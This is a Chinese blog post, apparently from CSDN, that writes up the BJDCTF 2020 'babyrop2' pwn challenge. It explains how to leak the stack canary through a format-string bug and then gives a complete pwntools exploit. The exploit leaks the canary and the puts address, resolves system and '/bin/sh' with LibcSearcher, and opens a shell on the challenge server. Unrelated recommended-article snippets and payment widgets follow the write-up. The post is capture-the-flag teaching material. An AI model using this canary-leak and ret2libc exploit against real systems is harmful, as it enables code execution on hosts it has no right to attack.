NSSCTF Pwn [BJDCTF 2020]babyrop2 题解

最新推荐文章于 2025-05-03 09:07:35 发布
最新推荐文章于 2025-05-03 09:07:35 发布
阅读量183 收藏
点赞数 2
分类专栏: BUUCTF Pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/145563040
版权

下载 checksec exeinfo

64位 开启了canary和NX保护

IDA64 查看函数

可以看到有格式化字符串漏洞和栈溢出漏洞

利用格式化字符串漏洞泄露canary

因为这里的printf限制了输入字符 所以需要一个个试偏移:

输入字符的偏移为6

接下来动态调试到printf的位置,查看栈情况:

可以看到canary距离输入的字符串8字节 离rbp也是8个字节

canary的偏移为7;

得到了canary之后,就是ret2libc的流程了

exp:

from pwn import *
from LibcSearcher import *

p = remote("node4.anna.nssctf.cn", 28006)
elf = ELF('./babyrop2')
#gdb.attach(p)
#pause()


p.send(b'aa%7$p')
p.recvuntil(b'0x')
canary = int(p.recv(16), 16)
print(hex(canary))

pop_rdi = 0x400993
vuln_addr = 0x0400887
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.symbols['main']

payload = b'a' * (0x20 - 8) + p64(canary) + p64(0) + p64(pop_rdi) +  p64(puts_got)  + p64(puts_plt)+ p64(vuln_addr)

p.sendlineafter("story!\n", payload)

puts_address = u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_address))

libc = LibcSearcher('puts', puts_address)
offset = puts_address - libc.dump('puts')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')

payload2 = b'a' * (0x20 - 8) + p64(canary) + p64(0) + p64(pop_rdi)  + p64(binsh)+ p64(system)
p.sendline(payload2)

p.interactive()

运行 得到flag

通知 | 2024 GDE&AI智能应用全球开发者大赛(高校组)
开放知识图谱
10-11 720
大赛介绍:随着低代码、AI等新技术的成熟,数智开发已加速迈入新时代!智能体(Agent),尤其是基于大模型(LLM)的智能体,是人工智能的关键分支,能模拟人类决策,提升工作效率,对社会影响深远。在工业、智慧城市等领域,它优化资源配置,提升生活品质,促进人机协同,推动科技创新与产业升级。智能体技术的发展正引领社会迈向高效智能,为构建智慧社会、实现可持续发展目标提供有力支撑。2024 GDE&...
2022爱分析・人工智能应用实践报告
爱分析ifenxi
02-28 6145
报告编委 特别鸣谢(按拼音排序) 报告摘要 人工智能在产业中落地的20大挑战 自2019年起,人工智能的发展进入与产业加速融合的阶段。经过近几年的发展,人工智能已经广泛渗透进金融、零售、工业、能源、医疗、城市管理等多个行业和领域,并且一些行业头部企业已经全面拥抱了智能化转型。 由于可获取和参考的建设经验有限,加上企业所处行业、发展阶段的不同,自身需求以及拥有的资源禀赋各异等因素,人工智能在产业中落地充满挑战。在本报告中,爱分析基于大量调研和过往研究积累,从战略、数据、场景规划、应用解决方案开发、技术基.
恒驰喜讯 | 出席华为GDE&AskO3开发者大会,荣获“AskO3卓越贡献奖”!
03-11 563
● 旨在共同规划AskO3的未来,让AskO3在使能伙伴的道路上更进一步,通过本次研讨,共同识别开箱即用的高价值应用、探讨平台和模型框架如何更好地支持开发者,明确关键能力与发展方向。受邀出席本次大会,与技术大咖、行业专家、学术领军人物及广大伙伴、高校、华为的优秀开发者们,共同分享行业趋势、AskO3的最新能力、前沿创新案例以及优秀的开发者实践。O3社区是连接华为与伙伴的重要桥梁,通过连接,华为更直接地使能伙伴,伙伴简单、直接、高效作业、装备数智化升级,更好地服务客户。AI如何重塑软件开发和使能高效交付。
星厨齐聚,演绎致美奢厨:2022米兰家具展中的ASKO×NORM展厅
cnmjwz的博客
06-15 248
自然是人类历史长河中永恒的命题,而自然与生活的和谐共生正是一场美与爱的设计思辨——厨房作为生活的一部分,也延续着与自然的对话,而不同品牌对于厨房、自然与爱的理解更有着各自独特的风格。6月7日至12日,ASKO在2022年米兰EuroCucina 家具展上与同源于北欧的建筑品牌Norm Architects 携手合作,完成了一次对自然的完美诠释。怀揣着创造有意义、舒适且美好生活的共同理想,以“Scandinavian Moment”为题,ASKO与NORM为本次米兰家具展构建了发人深思的家居情境。ASKO×N
城南中心项目分析——海信慧园
aylr2015的博客
11-28 300
海信慧园项目分析记录
洗衣机OOB技术:定义、现状、实现方式及优缺点分析
2401_83448585的博客
11-28 1209
动态OOB检测(DOOB):利用先进的算法来分析洗衣机的运行数据,如电机的电流变化、旋转速度等,以判断是否有失衡的情况发生。综上所述,OOB检测技术在现代洗衣机中的应用显著提高了机器的安全性和洗涤效果,但也带来了一定的成本和技术复杂性。4. 智能化操作:现代洗衣机通过智能算法和传感器,能够自动识别和处理失衡问题,减少用户的干预,提升用户体验。3. 减少噪音和震动:有效的OOB检测可以减少洗衣机在运行过程中的异常震动和噪音,提供更安静的使用环境。
中企海外周报 | 中国众多品牌亮相IFA;喜茶新加坡第三家店开业
美通社
09-08 1424
摘要TCL通讯、海信、绘王、涂鸦智能、洽洽、喜茶、名创优品、绿宝集团、华为、宁德时代、隆基、新希望六和、徐工、长城汽车、恒洁卫浴、动点科技、太平鸟、梦东方电影等中国企业海...
推荐开源项目:Gesko - 极简主义的Jekyll博客引擎
gitblog_00432的博客
09-02 1023
推荐开源项目:Gesko - 极简主义的Jekyll博客引擎 GeskoGesko is a simple and minimalistic jekyll blogging theme.项目地址:https://gitcode.com/gh_mirrors/ge/Gesko 在寻求简洁与高效的数字表达时,我们不时会遇到那些令人心动的开源宝藏。今天,就让我们一同探索Gesko——一个基于Jekyl...
AWE2025艾普兰奖正式揭晓,展现家电产业蓬勃新质生产力
TMT_XQ的博客
03-23 908
艾普兰获奖作品的背后,是中国家电及消费电子行业研发人员夜以继日的孜孜以求。
Asko雅士高抽油烟机 CW4936S安装使用手册.pdf
02-11
Asko雅士高抽油烟机CW4936S】是一款高级的厨房电器,旨在提供高效的油烟抽排效果,并带有智能化的操作系统。该设备配备了详细的用户指南,以帮助用户了解其功能、安全操作和维护方法。以下是该抽油烟机的主要特点...
Asko雅士高滚筒洗衣机 W4106R.W.CN安装使用手册.pdf
02-11
Asko雅士高滚筒洗衣机 W4106R.W.CN】是一...总的来说,Asko雅士高滚筒洗衣机 W4106R.W.CN是一款集安全性、高效性和人性化设计于一体的家用电器。为了确保最佳使用体验和机器寿命,用户必须遵循操作指南中的各项指导。
Asko雅士高滚筒热泵干衣机 T208C.W.CN安装使用手册.PDF
02-11
机器报错——故障排除指南部分则为用户提供了在遇到问题时的自我诊断和解决建议。比如,常见的门锁故障、温度传感器问题等,通过手册的指导,用户能够迅速定位问题并尝试进行修复。 除了上述内容,手册还提供了售后...
Asko雅士高全嵌式冷藏_冷冻冰箱 RFN31842I安装使用手册.pdf
02-11
Asko雅士高全嵌式冷藏_冷冻冰箱 RFN31842I安装使用手册】提供了关于这款高端家电产品的详细操作指南。雅士高(Asko)是一款知名的家电品牌,其产品以简约设计和优化用户体验而著称。这份说明书涵盖了安全提示、...
Asko雅士高滚筒热泵干衣机 T108H.W.CN安装使用手册.PDF
02-11
本手册涵盖了滚筒式干衣机的安全指南、产品描述、安装和连接、烘衣前的小技巧、烘干步骤、系统设定、清洁和保养、机器报错——故障排除指南、售后服务、技术信息、程序图表、回收处理等内容。 安全指南 在使用滚筒...
自然语言处理实战:用CRF打造高精度命名实体识别系统
最新发布
Loving_enjoy的博客
05-03 2098
无论是想快速搭建一个可用的NER系统,还是希望深入理解概率图模型的精髓,CRF都是值得放入工具箱的利器。'prev_is_b-geo': prev_tag == 'B-GEO' # 假设prev_tag是前一个标签。('参观天安门', ['O', 'B-POI', 'I-POI', 'I-POI'])" —— 人工智能先驱吴恩达。- **BiLSTM-CRF**:经典组合,在CoNLL-2003达到91%的F1值。('北京市', ['B-GEO', 'I-GEO', 'I-GEO']),
远光软件发布九天 AI 应用开发平台,加速企业研发效能跃升
YG_JT的博客
04-30 1618
4月25日,远光软件在“2025珠海软件产业年会暨AI技术赋能行业发展交流会”上以虚拟直播方式发布了远光九天AI应用开发平台。
Python项目--基于计算机视觉的手势识别控制系统
exlink2012的专栏
04-23 4530
随着人机交互技术的快速发展,传统的键盘、鼠标等输入设备已经不能满足人们对自然、直观交互的需求。手势识别作为一种非接触式的人机交互方式,具有操作自然、交互直观的特点,在智能家居、游戏控制、虚拟现实等领域有着广泛的应用前景。 本项目旨在开发一个基于计算机视觉的手势识别控制系统,通过摄像头捕获用户的手部动作,实时识别手势类型,并将识别结果转化为相应的控制命令,实现对计算机或其他设备的非接触式控制。
操作系统级竞争开启:AI Agent 能否成为人形机器人爆发的奇点?
望获实时Linux系统
04-30 1851
本文深入探讨了在人形机器人产业从“机械执行”向“自主决策”跃迁的背景下,实时操作系统(RTOS)与AI Agent融合对突破物理世界响应极限的关键作用,重点分析了望获实时Linux等国产RTOS的技术优势及其在不同领域的应用前景,同时客观阐述了产业面临的挑战与机遇,旨在为相关领域的学术研究和产业发展提供参考与借鉴。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值